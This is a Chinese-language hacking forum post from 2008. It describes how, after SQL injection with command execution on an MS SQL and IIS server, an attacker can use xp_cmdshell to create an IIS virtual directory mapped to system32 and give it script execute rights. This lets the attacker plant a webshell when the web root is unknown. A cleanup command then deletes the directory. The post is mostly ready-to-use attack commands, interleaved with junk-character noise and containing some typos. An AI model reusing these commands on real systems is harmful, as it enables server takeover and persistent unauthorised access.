|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
( Q6 |, X, i" y6 ]) }
7 x* a, r3 W$ \4 c- a4 A! pexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'/ o* e R& |: O+ \$ M* N
建立虚拟目录win,指向c:\windows\system323 I/ _! B2 U5 r" L3 ~
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
% W! U$ A7 D0 `" F让win句有解析asp脚本权限
( {+ H- z8 w2 \' |5 n: s1 Z$ Y- p
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
0 K' b+ ~7 a1 \; @2 n删除虚拟目录。
; J/ i5 S8 j5 k) L找不到web绝对路径的一种解决办法,
' _. V* t! B5 y; _- r; F
2 m: { d5 z M9 |403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
